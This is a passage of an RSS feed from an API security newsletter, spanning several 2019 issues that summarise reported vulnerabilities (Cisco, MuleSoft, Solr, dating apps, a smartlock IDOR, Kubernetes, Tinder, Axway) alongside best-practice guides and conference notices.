<p>Facebook and Instagram have suffered from scraping apps that used the APIs to download and collect vast amounts of personal data. These days they (and Google too) are trying to hunt down any such use, being afraid of another Cambridge Analytica.</p>
<p>Now we have a case of the other side of the API economy suffering: one of Facebook/Instagram partners, a scheduling app Social Report <a href="https://reclaimthenet.org/facebook-revokes-api-keys-to-scheduler-marketing-partner-social-report/" target="_blank" rel="noopener noreferrer">suffered a blow from the vendor revoking their API tokens</a>.</p>
<p>Managing and posting to the social platforms is Social Report&#8217;s core business. Losing the API access has put it in an existential risk.</p>
<p>This shows that both API providers and consumers need to keep API governance in mind and have a Plan B in case the relationship goes wrong.</p>
<ul>
<li>If you are the provider, how do you prevent and detect API abuse? What do you do when you uncover abuse?</li>
<li>As an API consumer, how much do you depend on APIs from a single vendor? How do you ensure that your usage is in line with their policies? How do you manage that relationship and get early warnings of potential trouble ahead? What do you do if you lose access?</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-48-vulnerabilities-verizon-gps-trackers-s3-bucket-names-leaking/">Issue 48: Vulnerabilities at Verizon and GPS trackers, S3 bucket names leaking</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 47: Cisco and MuleSoft vulnerabilities, API World passes</title>
		<link>https://apisecurity.io/issue-47-cisco-mulesoft-vulnerabilities-api-world-passes/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 04 Sep 2019 22:00:08 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6287</guid>

					<description><![CDATA[<p>This week we look into the recent API vulnerability in Cisco routers, how MuleSoft handled severe vulnerability in their API gateway, API security aspects of communication PaaS, and passes for upcoming API World conference in San Jose, CA. Vulnerabilities: Cisco Cisco has implemented their REST API as a virtual service container for IOS XE. This [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-47-cisco-mulesoft-vulnerabilities-api-world-passes/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-47-cisco-mulesoft-vulnerabilities-api-world-passes/">Issue 47: Cisco and MuleSoft vulnerabilities, API World passes</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week we look into the recent API vulnerability in Cisco routers, how MuleSoft handled severe vulnerability in their API gateway, API security aspects of communication PaaS, and passes for upcoming API World conference in San Jose, CA.</p>
<h2>Vulnerabilities: Cisco</h2>
<p>Cisco has implemented their REST API as a virtual service container for IOS XE. This operating system is used on a variety of Cisco routers. It is not enabled by default but needs to be installed by administrators who need the REST API functionality.</p>
<p>Quoting Cisco on the <a target="_blank" href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190828-iosxe-rest-auth-bypass" rel="noopener noreferrer">details of the patched vulnerability</a>:</p>
<blockquote><p><em>&#8220;The vulnerability is due to an improper check performed by the area of code that manages the REST API authentication service. An attacker could exploit this vulnerability by submitting malicious HTTP requests to the targeted device. A successful exploit could allow the attacker to obtain the token-id of an authenticated user. This token-id could be used to bypass authentication and execute privileged actions through the interface of the REST API virtual service container on the affected Cisco IOS XE device.&#8221;</em></p></blockquote>
<h2>Vulnerabilities and Policies: MuleSoft</h2>
<p>MuleSoft is an integration company recently acquired by Salesforce.com. Their platform allows customers to integrate various internal systems and expose them as APIs.</p>
<p>They had a severe flaw in their runtime and API gateway. Attackers were able to remotely push arbitrary files to the operating system and even get them executed. This is a critical vulnerability, especially to anyone who is using the system on-premises with access to critical internal systems.</p>
<p><a target="_blank" href="https://www.zdnet.com/article/how-mulesoft-patched-a-critical-security-flaw-and-avoided-a-disaster/" rel="noopener noreferrer">ZDNet story</a> covers not just the flaw but also the great job that the company did on handling the vulnerability and working with their customers to have it fixed. The company went great lengths to ensure that each of their on-premises customers installed the patch as quickly as possible.</p>
<p>This also demonstrates why API security products are complementary to API gateways and should be used side by side as the extra layer of security.</p>
<h2>Communication APIs and Security</h2>
<p>Communications platform-as-a-service (CPaaS) APIs such as Twilio can help developers give their users rich communication capabilities.</p>
<p>Channel Futures has a story of the <a target="_blank" href="https://www.channelfutures.com/mssp-insider/api-security-cpaas-data-breaches-and-endpoint-security/2" rel="noopener noreferrer">API Security implications of using CPaaS</a>:</p>
<ul>
<li>Things to look for when picking CPaaS: API specification, authentication and authorization best practices, TLS</li>
<li>The differences in security approach for 3 main scenarios:
<ul>
<li>CPaaS invoking your endpoint</li>
<li>Your application invoking the CPaaS API</li>
<li>Your application using CPaaS code (e.g., SDK, iframe)</li>
</ul>
</li>
<li>Affect on risk and threat surface</li>
</ul>
<h2>Conferences: API World</h2>
<p><a target="_blank" href="https://apiworld.co/" rel="noopener noreferrer">API World</a> is one of the biggest API conferences. More than 3,500 attendees are expected to come to San Jose October 8-10, 2019 to attend it.</p>
<p>Security is becoming a part of the agenda this year too.</p>
<p>If you do not have a pass yet, <a target="_blank" href="https://42crunch.com/join-api-world-2019/" rel="noopener noreferrer">42Crunch is giving away some free passes on their website</a>.</p>
<p>The post <a href="https://apisecurity.io/issue-47-cisco-mulesoft-vulnerabilities-api-world-passes/">Issue 47: Cisco and MuleSoft vulnerabilities, API World passes</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 46: Cisco and Facebook patch APIs, Solr API parameter injection</title>
		<link>https://apisecurity.io/issue-46-cisco-and-facebook-patch-apis-solr-api-parameter-injection/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 28 Aug 2019 22:00:20 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6268</guid>

					<description><![CDATA[<p>This week, Cisco and Facebook have patched their APIs, a detailed report on Solr parameter injection is out, and GitHub continues their fight against API keys and tokens in public repositories. Vulnerabilities: Cisco Cisco has released patches for several critical API security flaws  in its Cisco Unified Computing System (UCS) software and Small Business 220 [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-46-cisco-and-facebook-patch-apis-solr-api-parameter-injection/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-46-cisco-and-facebook-patch-apis-solr-api-parameter-injection/">Issue 46: Cisco and Facebook patch APIs, Solr API parameter injection</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, Cisco and Facebook have patched their APIs, a detailed report on Solr parameter injection is out, and GitHub continues their fight against API keys and tokens in public repositories.</p>
<h2>Vulnerabilities: Cisco</h2>
<p>Cisco has released <a href="https://www.networkworld.com/article/3433516/cisco-6-critical-security-alarms-for-ucs-software-small-biz-routers.html" target="_blank" rel="noopener noreferrer">patches for several critical API security flaws</a>  in its Cisco Unified Computing System (UCS) software and Small Business 220 Series Smart Switch routers. The flaws center around the APIs behind the web-based management interfaces.</p>
<p>With both UCS Director and UCS Director Express for Big Data, improper handling of authentication requests and insufficient validation of request headers could allow attackers either bypass the authentication completely, or login using the SCP User account that had default credentials. Attackers could then execute arbitrary commands, or even get administrator access.</p>
<p>On router side, insufficient authorization checks could allow attackers to send malicious requests to modify the device configuration or inject a reverse shell. Another vulnerability could allow an unauthenticated attacker to trigger a buffer overflow and subsequently remotely execute arbitrary code.</p>
<p>Yet another lesson on the importance of proper validation of all parameters, payloads and headers coming in, as well as proper authorization implementation.</p>
<h2>Vulnerabilities: Facebook</h2>
<p>In a less sinister case, an authorization vulnerability (aka IDOR) in Facebook API allowed Philippe Harewood to <a href="https://philippeharewood.com/removing-profile-pictures-for-any-facebook-user/" target="_blank" rel="noopener noreferrer">disassociate the profile picture of any user from their profile</a>.</p>
<p><code>profile_picture_remove</code> API call had a <code>profile_id</code> parameter that an attacker could substitute with an ID of any other Facebook user.</p>
<p>Although the disassociated picture was not deleted from the account and the profile picture was replaced with the Facebook&#8217;s default one, this is still an authorization vulnerability so something Facebook fixed with the bounty award sent to the researcher.</p>
<h2>Vulnerabilities: Apache Solr Injection</h2>
<p><a href="http://lucene.apache.org/solr/" rel="nofollow">Apache Solr</a> is an open source enterprise search platform. The Solr API uses only HTTP protocol and is available without any authentication by default.</p>
<p>In his research, <a href="https://github.com/veracode-research/solr-injection/" target="_blank" rel="noopener noreferrer">Michael Stepankin from Veracode</a> has explored how this could turn into an exploitable vulnerability. He discusses, for example:</p>
<ul>
<li>Solr Parameters Injection (HTTP smuggling)</li>
<li>Solr Local Parameters Injection</li>
<li>Remote code execution (RCE) through Apache Solar Injection</li>
</ul>
<p>All examples have details and sample API calls.</p>
<h2>Tools: GitHub Token Scanning service</h2>
<p>Leaked API keys remain one of the major sources of API breaches. Just like with a username and password, anyone having an API key can invoke an external API on your behalf. For example, this is how Samsung SmartThings service got hacked <a href="https://apisecurity.io/issue-31-samsung-smartthings-repo-token-leaks-facebook-fined-api-vulnerability/" target="_blank" rel="noopener noreferrer">recently</a>.</p>
<p>About a year ago, GitHub started their Token Scanning service that identifies tokens shared in public repositories. The service only works with tokens from specific vendors in formats known to it. Not only does the developer get notified, GitHub also tells the corresponding partner about the leak so the token can get revoked.</p>
<p>The service initially launched with support for tokens from Alibaba Cloud, AWS, Azure, Google Cloud, Mailgun, npm, Slack, Stripe, and Twilio.</p>
<p>GitHub has just <a href="https://github.blog/2019-08-19-github-token-scanning-one-billion-tokens-identified-and-five-new-partners/" target="_blank" rel="noopener noreferrer">reported crossing the treshold of 1 bln potential tokens identified, and added more partners: Atlassian, Dropbox, Discord, Proctorio, and Pulumi</a>.</p>
<p>The 1 billion mark is staggering by itself. Shows how wide-spread the issue is.</p>
<p>The post <a href="https://apisecurity.io/issue-46-cisco-and-facebook-patch-apis-solr-api-parameter-injection/">Issue 46: Cisco and Facebook patch APIs, Solr API parameter injection</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 45: Hacked dating apps and smartlocks, &#8220;Egregious 11&#8221; cloud security issues</title>
		<link>https://apisecurity.io/issue-45-hacked-dating-apps-smartlocks-cloud-egregious-11/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 21 Aug 2019 22:00:26 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6242</guid>

					<description><![CDATA[<p>This week, we take look at the recent location API vulnerabilities in dating apps and smartlocks. In addition, we have an API security video from RSA Conference in Singapore, and the survey results and API security recommendations from Cloud Security Alliance. Vulnerability: dating apps BBC has run a story on the common API vulnerability pattern [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-45-hacked-dating-apps-smartlocks-cloud-egregious-11/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-45-hacked-dating-apps-smartlocks-cloud-egregious-11/">Issue 45: Hacked dating apps and smartlocks, &#8220;Egregious 11&#8221; cloud security issues</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take look at the recent location API vulnerabilities in dating apps and smartlocks. In addition, we have an API security video from RSA Conference in Singapore, and the survey results and API security recommendations from Cloud Security Alliance.</p>
<h2>Vulnerability: dating apps</h2>
<p>BBC has run a story on the common <a href="https://bbc.com/news/technology-49265245" target="_blank" rel="noopener noreferrer">API vulnerability pattern across several gay dating applications</a>: Recon, Grindr, and Romeo.</p>
<p>All of these applications show other members in the user&#8217;s proximity. The API vulnerability is a combination of two factors:</p>
<ul>
<li>API can be invoked outside of the application and spoofed client coordinates can be supplied as parameters</li>
<li>API returns other members&#8217; exact distance from these coordinates</li>
</ul>
<p>Attackers could run API calls and supply different locations. Once they knew the exact distance to a user from three different points, they could then determine the user&#8217;s exact location using trilateration.</p>
<p>Needless to say, this kind of an API flaw could potentially become a source of a physical security threat for app users.</p>
<p>We have covered other dating apps&#8217; API vulnerabilities in issues <a href="https://apisecurity.io/issue-18-security-audits-for-your-api-contracts-google-limits-gmail-api-access/">18</a> and <a href="https://apisecurity.io/issue-44-acs-2019-agenda/">44</a>.</p>
<h2>Vulnerability: FB50 smartlock</h2>
<p>FB50 smartlocks are sold under different brands and have more than 15,000 estimated customers. Researchers have found <a href="https://icyphox.sh/blog/fb50/" target="_blank" rel="noopener noreferrer">the lock service APIs vulnerable to Insecure Direct Object Reference (IDOR) attack</a>, opening the door for a full takeover.</p>
<p>IDOR vulnerabilities are essentially authorization issues. In such cases, credentials for one account can be used to access data for other accounts.</p>
<p>Here&#8217;s how the attack worked:</p>
<ol>
<li>Attacker creates an FB50 smartlock account with the vendor.</li>
<li>Attacker scans for Bluetooth devices near a smartlock to get the MAC address.</li>
<li>Attacker makes a REST API call to the FB50 cloud service for a device query based on the MAC address of the lock. This gives the attacker the barcode and ID of the lock.</li>
<li>Attacker supplies the lock&#8217;s barcode in an API call and gets the user ID of the owner of the lock.</li>
<li>Attacker supplies the lock ID and the user ID in an API call to unbind the lock from the user.</li>
<li>Attacker makes an API call providing their user ID, a new name for the lock, and the MAC of the lock to take ownership of the lock.</li>
</ol>
<h2>RSAC Singapore: The state of API security</h2>
<p>Videos from the recent RSA Conference in Singapore are coming out. <a href="https://www.bankinfosecurity.com/state-api-security-a-12928" target="_blank" rel="noopener noreferrer">This video</a> has a conversation between Varun Haran and Jacques Declas on the state of API security:</p>
<ul>
<li>How API security has evolved</li>
<li>API security and the role that DevSecOps plays</li>
<li>API security for microservices in the world of Kubernetes</li>
</ul>
<h2>Surveys: Egregious 11 cloud security issues</h2>
<p>Cloud Security Alliance has released their <a href="https://www.zdnet.com/article/cloud-security-is-too-important-to-leave-to-cloud-providers/" target="_blank" rel="noopener noreferrer">&#8220;Egregious 11&#8221; cloud security issues report</a>. The report is the result of a survey that they ran across 241 industry experts.</p>
<p>Needless to say that API security comes out as one of the top issues. Here are some recommendations that they include:</p>
<ul>
<li>Practice good API hygiene, including diligent oversight of things like inventory, testing, auditing, and abnormal activity protections.</li>
<li>Consider using standard and open API frameworks.</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-45-hacked-dating-apps-smartlocks-cloud-egregious-11/">Issue 45: Hacked dating apps and smartlocks, &#8220;Egregious 11&#8221; cloud security issues</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 44: ACS 2019 Agenda</title>
		<link>https://apisecurity.io/issue-44-acs-2019-agenda/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 14 Aug 2019 22:00:36 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6226</guid>

					<description><![CDATA[<p>This week, we look at API vulnerabilities in Kubernetes and 3Fun, upcoming API Specification Conference, and slides from EIC 2019 conference presentation. Vulnerabilities: Kubernetes Kubernetes has fixed the API vulnerability CVE-2019-11247. This flaw allowed attackers to access, modify, or delete computing and storage resources configured across a Kubernetes cluster. The issue was with authorization logic [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-44-acs-2019-agenda/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-44-acs-2019-agenda/">Issue 44: ACS 2019 Agenda</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we look at API vulnerabilities in Kubernetes and 3Fun, upcoming API Specification Conference, and slides from EIC 2019 conference presentation.</p>
<h2>Vulnerabilities: Kubernetes</h2>
<p>Kubernetes <a target="_blank" href="https://www.enterpriseai.news/2019/08/08/another-week-another-kubernetes-security-flaw/" rel="noopener noreferrer">has fixed the API vulnerability CVE-2019-11247</a>.</p>
<p>This flaw allowed attackers to access, modify, or delete computing and storage resources configured across a Kubernetes cluster. The issue was with authorization logic that allowed intruders to access cluster-wide resources with only standard role-based access control (RBAC) permissions.</p>
<p>To obtain the fix, upgrade your Kubernetes to v1.13.9, v1.14.5, or v1.15.2.</p>
<h2>Vulnerabilities: 3Fun</h2>
<p>The group dating app 3Fun <a target="_blank" href="https://www.pentestpartners.com/security-blog/group-sex-app-leaks-locations-pictures-and-other-personal-details-identifies-users-in-white-house-and-supreme-court/" rel="noopener noreferrer">was leaking location and personal information from 1.5 mln users</a>.</p>
<p>The app had an insecure API that provided information on other app users nearby your location based on your actual coordinates. The coordinates were supposed to come from the mobile app, but they could just as well be supplied as parameters of API calls.</p>
<p>Leveraging this, researchers from Pen Test Partners (as well as any attacker) were able to call the API with various spoofed coordinates to enumerate users in different cities. Even worse, the API returned <em>all</em> information about these users: exact location, birthday, gender, sexual preferences, pictures, chats.</p>
<p>In theory, users could choose to restrict what information they wanted to share. However, it was only the mobile application on the client side that was filtering the data and <em>hiding</em> the things user had flagged as confidential pieces. There was no filtering on the API itself, so someone calling the API directly would get all information, regardless of users&#8217; privacy settings.</p>
<p>Another reminder that APIs should be treated as the system edge, not the clients rendering the data.</p>
<h2>Conferences: ASC 2019</h2>
<p>API Specification Conference (ASC 2019) is taking place in Vancouver, Canada on October 15—17, 2019.</p>
<p>The conference is organized by the OpenAPI Initiative, the Linux Foundation project behind the OpenAPI standard. This is the evolution of the APIStrat event in the past.</p>
<p>This week, the organizers have <a target="_blank" href="https://events.linuxfoundation.org/events/asc-2019/program/schedule/" rel="noopener noreferrer">published the preliminary agenda</a>. There is a lot of great content, including sessions on API security.</p>
<p>A discount code ASC19ANNOUNCE worth $100 is valid until this Friday, August 16th.</p>
<h2>Slides: API Security in a Microservices World</h2>
<p>Philippe Leothaud has published the slides from the &#8220;<a target="_blank" href="https://www.slideshare.net/42crunch/api-security-in-a-microservices-world" rel="noopener noreferrer">API Security in a Microservices World</a>&#8221; talk that he gave at the European Identity and Cloud Conference (EIC) 2019 in Munich.</p>
<p>The slides cover the following themes:</p>
<ul>
<li>The concepts, goals, and architecture of microservices</li>
<li>Security challenges, with a concrete example with FAPI</li>
<li>Organizational challenges, DevSecOps</li>
<li>Further reading</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-44-acs-2019-agenda/">Issue 44: ACS 2019 Agenda</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 43: REST API Security Testing</title>
		<link>https://apisecurity.io/issue-43-rest-api-security-testing/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 07 Aug 2019 22:00:58 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6218</guid>

					<description><![CDATA[<p>This week, we have a conference talk recording demonstrating API pentesting;  see how the w3af web scanner can be used for APIs; look at SAP&#8217;s API security best practices; watch Cisco pay $8.6 million for not fixing vulnerabilities quickly. Conference talks The OWASP Global AppSec Tel Aviv conference has published a video recording of the [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-43-rest-api-security-testing/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-43-rest-api-security-testing/">Issue 43: REST API Security Testing</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have a conference talk recording demonstrating API pentesting;  see how the w3af web scanner can be used for APIs; look at SAP&#8217;s API security best practices; watch Cisco pay $8.6 million for not fixing vulnerabilities quickly.</p>
<h2>Conference talks</h2>
<p>The OWASP Global AppSec Tel Aviv conference has published a video recording of the &#8220;<a href="https://youtu.be/Gc7EUjRsrSo" target="_blank" rel="noopener noreferrer">Testing and Hacking APIs</a>&#8221; talk by Inon Shkedy.</p>
<p>Shkedy demonstrates approaches to API penetration testing, including:</p>
<ul>
<li>Analyzing payloads and authentication</li>
<li>Broken object-level access control (aka IDOR)</li>
<li>Mass assignment</li>
<li>Improper data filtering</li>
<li>Expanding attack surface</li>
</ul>
<h2>Tools: w3af</h2>
<p>Artem Smotrakov explains how the w3af web scanner <a href="https://medium.com/quick-code/security-testing-for-rest-api-with-w3af-2c43b452e457" target="_blank" rel="noopener noreferrer">can be used for REST API security testing</a>. His article includes:</p>
<ul>
<li>API discovery</li>
<li>Authentication</li>
<li>Disabling validation</li>
<li>Sample configuration</li>
<li>Context-specific parameters</li>
<li>Result analysis</li>
</ul>
<h2>Best practices</h2>
<p><a href="https://blogs.sap.com/2017/08/22/sap-cloud-platform-api-management-api-security-best-practices/" target="_blank" rel="noopener noreferrer">SAP has published</a> their API Security Best Practices in a blog series. The posts naturally promote SAP&#8217;s own tooling but the detailed practices can be useful regardless of which technology you use.</p>
<p>The discussed best practices include:</p>
<ul>
<li>IP whitelisting</li>
<li>Rate limiting</li>
<li>Data masking</li>
<li>JSON/XML/SQL injection attacks</li>
<li>Logging</li>
<li>Alerting</li>
</ul>
<h2>Price of vulnerability</h2>
<p>Cisco <a href="https://thehackernews.com/2019/08/cisco-surveillance-technology.html" target="_blank" rel="noopener noreferrer">got fined $8.6 million</a> for knowingly selling their Video Surveillance Manager (VSM) product that included API vulnerabilities to US federal and state agencies. The actual API flaws <a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130724-vsm" target="_blank" rel="noopener noreferrer">included lack of user input validation and insufficient authentication</a>. The basis for the fines is for ignoring the security issues for a long time while still continuing to sell the solution.</p>
<p>The post <a href="https://apisecurity.io/issue-43-rest-api-security-testing/">Issue 43: REST API Security Testing</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 42: HTTP Security Headers</title>
		<link>https://apisecurity.io/issue-42-http-security-headers/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 31 Jul 2019 22:00:49 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6206</guid>

					<description><![CDATA[<p>This week, we look into a validation vulnerability in Cisco APIs, security best practices for HTTP headers and OAuth 2.0, and the effect of microservice architectures on API security. Vulnerabilities: Cisco Cisco has fixed an API vulnerability in their Vision Dynamic Signage Director. The vulnerability stemmed from insufficient validation of incoming HTTP requests. An unauthenticated [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-42-http-security-headers/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-42-http-security-headers/">Issue 42: HTTP Security Headers</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we look into a validation vulnerability in Cisco APIs, security best practices for HTTP headers and OAuth 2.0, and the effect of microservice architectures on API security.</p>
<h2>Vulnerabilities: Cisco</h2>
<p>Cisco <a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190717-cvdsd-wmauth"> has fixed an API vulnerability</a> in their Vision Dynamic Signage Director. The vulnerability stemmed from insufficient validation of incoming HTTP requests. An unauthenticated remote attacker could craft a payload to exploit the vulnerability and execute arbitrary actions on the system with admin rights.</p>
<p>This is another reminder how important proper data validation is for API security.</p>
<h2>Best practices: HTTP security headers</h2>
<p>Charlie Belmer published his <a href="https://nullsweep.com/http-security-headers-a-complete-guide/">guide to HTTP security headers</a> that details out the following headers:</p>
<ul>
<li><code>Content-Security-Policy</code></li>
<li><code>Strict-Transport-Security</code></li>
<li><code>X-Content-Type-Options</code></li>
<li><code>Cache-Control</code></li>
<li><code>Expires</code></li>
<li><code>X-Frame-Options</code></li>
<li><code>Access-Control-Allow-Origin</code></li>
<li><code>Set-Cookie</code></li>
<li><code>X-XSS-Protection</code></li>
</ul>
<p>The guide also provides samples for how to configure the headers for a web server, and use them in some of the most common programming languages.</p>
<h2>Best practices: OAuth 2.0</h2>
<p>IETF has published a <a href="https://tools.ietf.org/html/draft-ietf-oauth-security-topics-12">draft of OAuth 2.0 Security Best Current Practices</a>. The recommendations update and extend the OAuth 2.0 Security Threat Model.</p>
<p>The world has changes a lot since the original standard was released. OAuth is being widely used, including critical applications. The endpoints have also become a lot more dynamic. The new recommendations incorporate practical experiences gathered in the recent years and cover new threats that have emerged.</p>
<p>If the full paper is too technical for you, see Torsten Lodderstedt&#8217;s slides &#8220;OAuth 2.0 Security Reinforced&#8221; that we <a href="https://apisecurity.io/issue-34-owasp-launches-api-security-top-10-project/">wrote about in an earlier issue</a>.</p>
<h2>Industry trends: Microservices and API security</h2>
<p>Microservices are destroying the edge and making application component communications public. They also increase development agility.</p>
<p>Charlotte Dunlap, Principal Analyst for GlobalData, <a href="https://itcblogs.currentanalysis.com/2019/07/22/microservices-apps-prompt-new-api-security-solutions/">looks into how these trends affect requirements for API security</a>. She also lists relevant tooling trends and vendor offerings.</p>
<p>The post <a href="https://apisecurity.io/issue-42-http-security-headers/">Issue 42: HTTP Security Headers</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 41: Tinder and Axway API Vulnerability, Equifax fined</title>
		<link>https://apisecurity.io/issue-41-tinder-and-axway-breached-equifax-fined/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 24 Jul 2019 22:00:53 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6197</guid>

					<description><![CDATA[<p>This week, we take a look into API vulnerabilities found in Tinder and Axway SecureTransport. In other news,  FTC and Equifax have reached a settlement related to the 2017 breach, and the slides for an API security talk have been posted. Vulnerability: Tinder Sanskar Jethi has found that Tinder enforces their premium features (such as [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-41-tinder-and-axway-breached-equifax-fined/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-41-tinder-and-axway-breached-equifax-fined/">Issue 41: Tinder and Axway API Vulnerability, Equifax fined</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look into API vulnerabilities found in Tinder and Axway SecureTransport. In other news,  FTC and Equifax have reached a settlement related to the 2017 breach, and the slides for an API security talk have been posted.</p>
<h2>Vulnerability: Tinder</h2>
<p>Sanskar Jethi has found that Tinder enforces their premium features (such as unblurred images of those who like you) to be available for premium membership <a href="https://medium.com/@sansyrox/hacking-tinders-premium-model-43f9f699d44" target="_blank" rel="noopener">only in the app, not in the API</a>. Their API actually delivers regular, unblurred images to everyone.</p>
<p>This is a similar vulnerability to the one in Facebook Marketplace API that <a href="https://apisecurity.io/issue-31-samsung-smartthings-repo-token-leaks-facebook-fined-api-vulnerability/" target="_blank" rel="noopener">we have discussed earlier</a>. Vendors need to treat their API features and API security as product features and security. Relying on just the application frontend and ignoring the expanded attack surface can bite you.</p>
<h2>Vulnerability: Axway SecureTransport</h2>
<p>Axway SecureTransport is a system for sharing, securing, managing, and tracking files. It is used by a variety of government and military organizations, as well as some large businesses.</p>
<p>This week, <a href="https://zero.lol/2019-07-21-axway-securetransport-xml-injection/" target="_blank" rel="noopener">Dominik Penner reported a vulnerability in the password reset API of SecureTransport</a>. The API does not require authentication and accepts XML payloads.</p>
<p>Dominic found that these XMLs can include <code>Doctype</code> and <code>Entity</code> elements. This opens the system up to various attacks, including denial of service (DoS) through entity expansion, server side request forgery (SSRF), and Document Type Definition (DTD) repurposing.</p>
<h2>Price of API security flaws: Equifax</h2>
<p>In 2017, Equifax was breached and private information of 147 million people got exposed. The breach <a href="https://republicans-oversight.house.gov/wp-content/uploads/2018/12/Equifax-Report.pdf" target="_blank" rel="noopener">started with unpatched Apache Struts exploit</a>. The system was not enforcing formats on incoming API calls and <a href="https://nvd.nist.gov/vuln/detail/CVE-2017-5638" target="_blank" rel="noopener">specifically crafted Content-Type header</a> allowed attackers to get in.</p>
<p>This week, a settlement between Equifax and FTC was announced. <a href="https://www.cbsnews.com/news/equifax-data-breach-settlement-equifax-will-pay-700-million-to-settle-data-breach-lawsuits/" target="_blank" rel="noopener">Equifax is set to pay up to $700 million</a> in various fines and compensations.</p>
<h2>Slides: Applying API Security at Scale</h2>
<p>Isabelle Mauny published slides from her &#8220;<a href="https://www.slideshare.net/42crunch/applying-api-security-at-scale-150940601" target="_blank" rel="noopener">Applying API Security at Scale</a>&#8221; webinar with NordicAPIs. Here&#8217;s a quick summary of the contents:</p>
<ol>
<li>Know your APIs and risks</li>
<li>Implementation principles</li>
<li>Self-hacking</li>
<li>Deployment principles</li>
<li>Visibility</li>
<li>Next steps</li>
<li>Resources</li>
</ol>
<p>The post <a href="https://apisecurity.io/issue-41-tinder-and-axway-breached-equifax-fined/">Issue 41: Tinder and Axway API Vulnerability, Equifax fined</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 40: Vulnerabilities in Instagram, 7-Eleven, Zipato</title>
		<link>https://apisecurity.io/issue-40-instagram-7-eleven-zipato/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 17 Jul 2019 22:00:30 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6150</guid>

